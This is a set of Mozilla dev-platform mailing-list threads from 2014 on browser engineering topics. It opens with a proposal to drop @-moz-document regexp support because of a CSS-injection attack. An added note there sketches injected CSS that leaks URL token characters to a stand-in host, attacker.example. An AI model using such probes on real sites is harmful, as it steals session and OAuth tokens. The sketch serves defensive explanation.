Unimplement: @-moz-document regexp support?
Summary: Attackers can extract secret URL components (e.g. session IDs, OAuth tokens) using @-moz-document. Using the regexp support and assuming a CSS injection (no XSS needed!), the attacker can probe the current URL with regular expressions and send the URL parameters to a third party. A demo of this exploit can be found at http://html5sec.org/cssession/. This attack has also been published in the academic paper "Scriptless Attacks: Stealing the pie without touching the sill" [1] by Mario Heiderich et al. and in numerous other presentations on this topic [2,3].

My suggestion is to either kill -moz-document for public web content or remove regexp support. What do you think?

Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=1035091
Spec: n/a. This was pushed out of CSS3 and did not make it into CSS4 selectors.
MDN: https://developer.mozilla.org/en-US/docs/Web/CSS/@document
Target release: ??
Platform coverage: desktop, android

[1] http://www.nds.rub.de/research/publications/scriptless-attacks/
[2] http://www.slideshare.net/x00mario/stealing-the-pie
[3] https://speakerdeck.com/mikewest/xss-no-the-other-s-cssconf-eu-2013

___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
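[Editor's note: the probing technique described in the summary above works roughly as follows. This is an illustrative sketch only — the victim/attacker host names and the token parameter are invented, not taken from the demo:]

```css
/* Injected CSS. Each @-moz-document regexp() rule applies only when the
   full document URL matches, so the rule that fires leaks one guessed
   character of a hypothetical ?token= parameter via a background fetch. */
@-moz-document regexp("https://victim\\.example/.*token=a.*") {
  body { background: url("https://attacker.example/leak?char=a"); }
}
@-moz-document regexp("https://victim\\.example/.*token=b.*") {
  body { background: url("https://attacker.example/leak?char=b"); }
}
/* ...one rule per candidate character, repeated per position,
   reconstructs the whole secret without running any script. */
```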
Improving Session Restore Experience (was Re: Reordering opened windows)
(Cc-ing Philipp Sackl, for UX feedback.)

At the moment, the simplified algorithm is the following:
1. Read sessionstore.js;
2. Open the first window;
3. Synchronously, for each window in sessionstore.js, in the order in which the windows were opened initially, trigger window opening. (Whenever a window is opened, restore its contents.)

Drawbacks:
* All windows race for CPU, DOM, HTTP cache, etc., which makes startup janky and pretty much ensures that Firefox becomes usable only once all windows have finished loading;
* Weird on-screen activity during startup, with all these windows showing up in an apparently arbitrary order, whether in front or in the back.

Ideally, I would like to change it as follows:
1. Read sessionstore.js;
2. Open the first window;
3. Open the window most likely to be used immediately (i.e. the most recently used window);
4. Asynchronously, once that window is restored, open in the background the second window most likely to be used immediately;
5. etc. (Whenever a window is opened, restore its contents.)

With this scheme, I believe that there are good chances that the user will be presented with the right window immediately, that the window will be usable faster, and that the loading of other windows will take place in the background, without distracting visual effects. However, we cannot do this as-is: changing the order in which windows are opened also changes their order in the Windows taskbar and, possibly, their order across Mac OS X desktops.

Now, you are right, we can probably do as follows:
1. Read sessionstore.js;
2. Open the first window;
3. For each window in sessionstore.js, in the order in which the windows were opened initially, trigger window opening (hidden);
4. Once we have opened the window that should appear first, make it visible and restore its contents;
5. Asynchronously, once that window is restored and the second window has been opened, make it visible and restore its contents;
6. etc.
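[Editor's note: the hidden-window variant above can be sketched like this. A minimal illustration only — openWindowHidden, showWindow, and restoreContents are hypothetical stand-ins, not actual Session Restore APIs:]

```javascript
// Sketch of the proposed order: open every window hidden in its original
// order (preserving taskbar order), then reveal and restore the windows
// one at a time, most recently used first.
async function restoreSession(sessionWindows, openWindowHidden, showWindow, restoreContents) {
  // Steps 1-3: open all windows hidden, in their original order.
  const opened = sessionWindows.map(w => ({ state: w, win: openWindowHidden(w) }));

  // Steps 4-6: reveal and restore sequentially, most recently used first,
  // so windows never race each other for CPU, DOM, or the HTTP cache.
  const byRecency = [...opened].sort((a, b) => b.state.lastUsed - a.state.lastUsed);
  const restoredOrder = [];
  for (const { state, win } of byRecency) {
    showWindow(win);
    await restoreContents(win, state); // finish before touching the next window
    restoredOrder.push(state.id);
  }
  return restoredOrder;
}
```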
A bit more complicated, but it should provide almost the same result.

Cheers,
David

On 06/07/14 11:08, Neil wrote:
David Rajchenbach-Teller wrote:
We are considering redesigning slightly how windows are reopened by Session Restore, to ensure that the most recently used windows are loaded first.

I can't quite tell from your phrasing whether the bottleneck here is the time it takes to open windows. I'm assuming it is, and that Session Restore has to wait for all the windows to open so that it can prioritise loading the most recent window first. Since Session Restore already knows things such as the size and position of the window it wants to restore, I'm wondering whether it might be possible to open the windows to about:blank and then start loading browser.xul in the most recent window first. (Obviously this only helps if there are three or more windows to restore, since you have to have loaded browser.xul in the first window to know you want to restore the previous session.)

-- David Rajchenbach-Teller, PhD
Performance Team, Mozilla
Re: Improving Session Restore Experience (was Re: Reordering opened windows)
Seems to me there are advantages to the more complicated version anyway. Whilst it is reasonable to load the contents of the window they are likely to use first, I'm not sure it follows that you can avoid displaying the other windows until the first has finished loading. I imagine users could be unhappy if it takes a significant amount of time before some of their windows even appear. The thought process could go: "Where has my other window gone?! Oh no, did session restore not save it?! ... Oh wait, there it is. Phew."

Perhaps the other windows could be created and displayed with a "Loading contents, please wait." message. That way, if we have a really slow and complicated session to restore, the user isn't left lacking any clue as to whether they are getting all their windows back. Of course, this assumes creating and displaying the windows isn't the costly part.

On Monday, July 7, 2014 11:43:50 AM UTC+1, David Rajchenbach-Teller wrote:
Now, you are right, we can probably do as follows:
1. Read sessionstore.js;
2. Open the first window;
3. For each window in sessionstore.js, in the order in which the windows were opened initially, trigger window opening (hidden);
4. Once we have opened the window that should appear first, make it visible and restore its contents;
5. Asynchronously, once that window is restored and the second window has been opened, make it visible and restore its contents;
6. etc.
A bit more complicated, but it should provide almost the same result.
Re: Reordering opened windows
On 2014-07-04, 7:38 AM, David Rajchenbach-Teller wrote:
Hi, We are considering redesigning slightly how windows are reopened by Session Restore, to ensure that the most recently used windows are loaded first. I believe that, in many cases, this would enable users to start browsing faster.

Do we have data on how many users have multiple windows? I expect that we have very few such users, but data will carry the day. I'm mostly asking out of interest, because even if we have few multiple-window users, those users probably have lots of tabs. That's a good proxy for being a power user, and likely one who cares about restore responsiveness.

Nick
Unit testing internal JS
We have no unit test framework for internal JS; does anyone have any interesting ideas on how to accomplish this with our existing testing frameworks? Should I just leave unit testing functions in the JS file, so they can be run manually during future development?
Re: Unit testing internal JS
On 07/07/14 09:25, gkee...@mozilla.com wrote:
We have no unit test framework for internal JS; does anyone have any interesting ideas on how to accomplish this with our existing testing frameworks?

I've successfully used mochitest with SpecialPowers to access the internal interfaces. xpcshell should work too.
Re: Try-based code coverage results
Hey Joshua,

That's awesome! How long does the try run take that generated this data? We should consider scheduling a periodic job to collect this data and track it over time.

Jonathan

On 7/6/2014 10:02 PM, Joshua Cranmer wrote:
I don't know how many people follow code-coverage updates in general, but I've produced relatively up-to-date code coverage results based on http://hg.mozilla.org/mozilla-central/rev/81691a55e60f, and they may be found here: http://www.tjhsst.edu/~jcranmer/m-ccov/. In contrast to earlier versions of my work, you can actually explore the coverage as delineated by specific tests, as identified by their TBPL identifier. Christian's persistent requests for me to limit the depth of the treemap view are still unresolved because, well, at 2 AM, I just wanted to push a version that worked.

The test data was generated by pushing modified configs to try and using blobber features to grab the resulting coverage data. Only Linux32/64 is used, and only opt builds are represented (it's a --disable-optimize --disable-debug kind of build), the latter because I wanted to push a version out tonight and the debug .gcda tarballs are taking way too long to finish downloading. Effectively, only xpcshell tests and the M, M-e10s, and R groups are represented in the output data. M-e10s is slightly borked: only M-e10s(1) [I think] is shown, because treeherder didn't distinguish between the five of them. A similar problem with the debug M(dt1/dt2/dt3) test suites will arise when I incorporate that data. C++ unit tests are not present because blobber doesn't run on C++ unit tests for some reason, and jit-tests, jetpack tests, and Marionette tests await me hooking the upload scripts into those test suites (and jit-tests would suffer a similar numbering problem). The individual test suites within M-oth may be mislabeled because I can't sort names properly.
There's a final, separate issue with treeherder not recording the blobber upload artifacts for a few of the runs (e.g., Linux32 opt X), even though the run finished without errors and tbpl records those artifacts. So coverage data is missing for the affected runs. It's also worth noting that a few test runs are mired in timeouts and excessive failures, the worst culprit being Linux32 debug, where half the test suites either had some failures or buildbot timeouts (and no data at all). If you want the underlying raw data (the .info files I prepare from every individual run's info), I can provide that on request, but the data is rather large (~2.5G uncompressed).

In short:
* I have up-to-date code coverage on Linux 32-bit and Linux 64-bit. Opt is up right now; debug will be uploaded hopefully within 24 hours.
* Per-test [TBPL run] level of detail is visible.
* Treeherder seems to be having a bit of an ontology issue...
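[Editor's note: for anyone wanting to reproduce the post-processing step on the raw .info tracefiles mentioned above, merging them is typically done with the standard lcov tools. The file names below are placeholders, not the actual layout Joshua's scripts produce:]

```
# Merge two per-run lcov tracefiles and render a browsable HTML report.
# -a/--add-tracefile accumulates inputs; -o names the merged output.
lcov -a xpcshell.info -a mochitest-1.info -o merged.info
genhtml --output-directory coverage-report merged.info
```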
Re: Intent to implement and ship: Improved ruby parsing in HTML with new tag omission rules
On Tuesday, July 1, 2014 12:58:45 PM UTC-7, Koji Ishii wrote:
Summary: Two recent HTML changes improve ruby support: 1) addition of the rb and rtc elements (but not rbc); and 2) a matching update to the tag omission rules to make ruby authoring easier. By implementing these changes, Gecko supports the parsing side of all the ruby use cases required for the internationalization of HTML (see the use cases document below for details). It also enables the implementation of CSS Ruby Layout. The Japanese education market strongly requires this, and a Mozilla developer has already started working on it.

Could you elaborate on why we are using the more complicated W3C rules here instead of the simpler WHATWG rules, given that the WHATWG rules also address the same use cases? See: https://bugzilla.mozilla.org/show_bug.cgi?id=9#c110

-- Ian Hickson
Re: Try-based code coverage results
On 7/7/2014 11:39 AM, Jonathan Griffin wrote:
Hey Joshua, That's awesome! How long does the try run take that generated this data? We should consider scheduling a periodic job to collect this data and track it over time.

Well, it depends on how overloaded try is at the moment. ^_^ The builds take an hour themselves, and the longest-running tests on debug builds can run long enough to encroach on the hard (?) 2-hour limit for tests. Post-processing of the try data can take another several hours (a large part of which is limited by the time it takes to download ~3.5GB of data).

-- Joshua Cranmer
Thunderbird and DXR developer
Source code archæologist
Re: Unit testing internal JS
Garvan is referring to JS files that implement XPCOM interfaces. It's impossible to test internal details of the components without exposing them via an interface, which can end up convoluting the code in some cases.

Cheers,
Josh

On 07/07/2014 12:32 PM, Gijs Kruitbosch wrote:
On 07/07/2014 17:25, gkee...@mozilla.com wrote:
We have no unit test framework for internal JS; does anyone have any interesting ideas on how to accomplish this with our existing testing frameworks? Should I just leave unit testing functions in the JS file, so they can be run manually during future development?

I'm not sure what you mean by "internal JS". We have xpcshell tests, in which you could load an arbitrary JS file if you wanted, and then run tests against the functions in that file. Or if it's a JSM, you could load that and use the result of Cu.import to do internal tests (as that will produce a BackstagePass, which will allow you to interact with non-exported symbols from that JSM).

~ Gijs
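[Editor's note: to make the BackstagePass approach concrete, an xpcshell test might look like the sketch below. This only runs inside Gecko's xpcshell harness — Components.utils is not available elsewhere — and the module path and symbol names are invented:]

```javascript
// xpcshell test sketch. MyModule.jsm and internalHelper are hypothetical.
function run_test() {
  // Cu.import returns the module's global scope (a "BackstagePass"),
  // so symbols not listed in EXPORTED_SYMBOLS are reachable too.
  let scope = Components.utils.import("resource://gre/modules/MyModule.jsm", {});

  // Assert against a non-exported function directly.
  do_check_eq(typeof scope.internalHelper, "function");
}
```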
Re: Depending on libnotify
On 7/4/14, 7:46 AM, David Rajchenbach-Teller wrote:
Well, we basically have the Windows version implemented already. We could possibly use Watchman for other platforms. How do others feel about introducing a dependency on Watchman? The inotify limitation on watchers is indeed annoying in the long run, but OK for the kind of applications we have in mind, so that's OK for me.

If you don't need the robustness of Watchman, why add a dependency on it? It sounds like a one-off low-level interface to inotify (which you've already built?) is sufficient.
Re: Unit testing internal JS
On 7/7/2014 1:53 PM, Josh Matthews wrote:
Garvan is referring to JS files that implement XPCOM interfaces. It's impossible to test internal details of the components without exposing them via an interface, which can end up convoluting the code in some cases.

I expect you can import them using Cu.import if you want, just for testing. You might need to use an unusual import name like resource://gre/components/nsSomething.js.

--BDS
Re: Unit testing internal JS
On 7/7/14, 10:53 AM, Josh Matthews wrote:
Garvan is referring to JS files that implement XPCOM interfaces. It's impossible to test internal details of the components without exposing them via an interface, which can end up convoluting the code in some cases.

Really? I thought you could Cu.import() a JS file implementing a component and then use the returned BackstagePass to inspect unexported symbols.
Re: Try-based code coverage results
On Mon, Jul 7, 2014 at 11:11 AM, Jonathan Griffin jgrif...@mozilla.com wrote:
I guess a related question is, if we could run this periodically on TBPL, what would be the right frequency? We could potentially create a job in buildbot that would handle the downloading/post-processing, which might be a bit faster than doing it on an external system.

Ideally, you would be able to trigger it on a try run for specific test suites or even specific subsets of tests. For example, for certificate verification changes and SSL changes, it would be great for the reviewer to be able to insist on seeing code coverage reports on the try run that preceded the review request, for xpcshell, cppunit, and GTest, without doing coverage for all test suites. To minimize the performance impact further, ideally it would be possible to scope the try runs to cppunit, GTest, and xpcshell tests under the security/ directory in the tree. This would make code review more efficient, because reviewers wouldn't have to spend as much time suggesting missing tests as part of the review. In PSM, and probably in Gecko generally, people are unlikely to write new tests for old code that they are not changing, so periodic full reports would be less helpful than reports for tryserver.

Cheers,
Brian
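[Editor's note: suite-level scoping of this kind is already expressible in a try commit message, as in the sketch below; the per-directory scoping Brian asks for is not, and the coverage switch itself would be new. Suite names reflect 2014-era try syntax as best we can tell:]

```
# Opt Linux builds, only the xpcshell and cppunit suites, no talos.
# There is no flag here for "tests under security/ only" — that part
# of the proposal would require new tooling.
try: -b o -p linux,linux64 -u xpcshell,cppunit -t none
```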
Re: Unimplement: @-moz-document regexp support?
That seems pretty bad. I think we should at least stop supporting it for Web content. David, what do you think?

Cheers,
Ehsan

On 2014-07-07, 4:56 AM, Frederik Braun wrote:
Summary: Attackers can extract secret URL components (e.g. session IDs, OAuth tokens) using @-moz-document. Using the regexp support and assuming a CSS injection (no XSS needed!), the attacker can probe the current URL with regular expressions and send the URL parameters to a third party. [...] My suggestion is to either kill -moz-document for public web content or remove regexp support. What do you think?
Re: Rethinking the crash experience
We should keep in mind that sometimes, due to startup crashes, we don't get to run any of the code in Firefox, so we can't gate the crash report submission on that code, at least in the case of startup crashes.

Cheers,
Ehsan

On 2014-07-05, 8:21 AM, David Rajchenbach-Teller wrote:
I haven't experienced crashes in some time, so I may have missed some redesigns, but last time I did, the crash experience looked as follows:
1. Something goes wrong in the code of Firefox;
2. Firefox dies;
3. Crash Reporter appears;
4. Eventually, if the user has clicked restart, Firefox restarts.

Point 3 strikes me as rubbing the user's nose in the problem we encountered, as well as possibly counter-productive if the crash takes place during shutdown. Could we redesign this as follows?
1. Something goes wrong in the code of Firefox;
2. Firefox dies;
3. The crash report is stored to disk, without any dialog;
4. If the crash happened during Firefox shutdown, do nothing; otherwise restart Firefox to its previous state (obviously, we need some measure to prevent this from looping);
5. Upon the next restart, display a bottom doorhanger on all windows: "Firefox or an add-on encountered a problem [a few seconds ago / on July 4th, 2014] and recovered. If you wish, Firefox can report it automatically so that we can fix the bug." [report / not this time / always report / never report]

My apologies if this is part of the ongoing CrashManager work.

Cheers,
David
Re: Rethinking the crash experience
On 07/07/14 21:21, Ehsan Akhgari wrote:
We should keep in mind that sometimes, due to startup crashes, we don't get to run any of the code in Firefox, so we can't gate the crash report submission on that code, at least in the case of startup crashes.

Yes, we clearly need to keep the current behavior as a fallback, in case of a startup or near-startup crash.

Cheers,
David

-- David Rajchenbach-Teller, PhD
Performance Team, Mozilla
Re: Try-based code coverage results
On 7/7/2014 1:11 PM, Jonathan Griffin wrote:
I guess a related question is, if we could run this periodically on TBPL, what would be the right frequency?

Several years ago, I did a project where I ran code coverage on roughly every nightly build of Thunderbird [1] (and I still have those results!). When I talked about this issue back then, people seemed to think that weekly was a good cadence. I think Christian Holler was doing builds roughly monthly a few years ago, based on an earlier version of my code-coverage-on-try technique, until those builds fell apart [2].

[1] Brief aside: if you thought building Mozilla code was hard, try building Mozilla code from two years ago (I was building 2008-era code in 2010)...
[2] I used to dump the code coverage data to stdout and had scripts to extract it from the tbpl logs. That stopped working when mochitest-1 logs grew way too long, and it wasn't until blobber was up and running that anyone re-attempted the project.

-- Joshua Cranmer
Thunderbird and DXR developer
Source code archæologist
Re: Try-based code coverage results
Filed https://bugzilla.mozilla.org/show_bug.cgi?id=1035464 for those who would like to follow along.

Jonathan

On 7/7/2014 3:22 PM, Jonathan Griffin wrote:
So it sounds like it would be valuable to add try syntax to trigger this, as well as to produce periodic reports. Most of the work needed is the same. I'll file a bug to track this; I don't have an ETA for starting work on it, but we want to get to it before things bitrot.

On 7/7/2014 12:49 PM, Joshua Cranmer wrote:
Several years ago, I did a project where I ran code coverage on roughly every nightly build of Thunderbird (and I still have those results!). When I talked about this issue back then, people seemed to think that weekly was a good cadence. I think Christian Holler was doing builds roughly monthly a few years ago based on an earlier version of my code-coverage-on-try technique until those builds fell apart.

On 7/7/2014 11:18 AM, Brian Smith wrote:
Ideally, you would be able to trigger it on a try run for specific test suites or even specific subsets of tests. [...] To minimize the performance impact further, ideally it would be possible to scope the try runs to cppunit, GTest, and xpcshell tests under the security/ directory in the tree.
Re: Try-based code coverage results
On 7/7/2014 5:25 PM, Jonathan Griffin wrote:
Filed https://bugzilla.mozilla.org/show_bug.cgi?id=1035464 for those who would like to follow along.

Perhaps bug 890116 is a better place to track this.

-- Joshua Cranmer
Thunderbird and DXR developer
Source code archæologist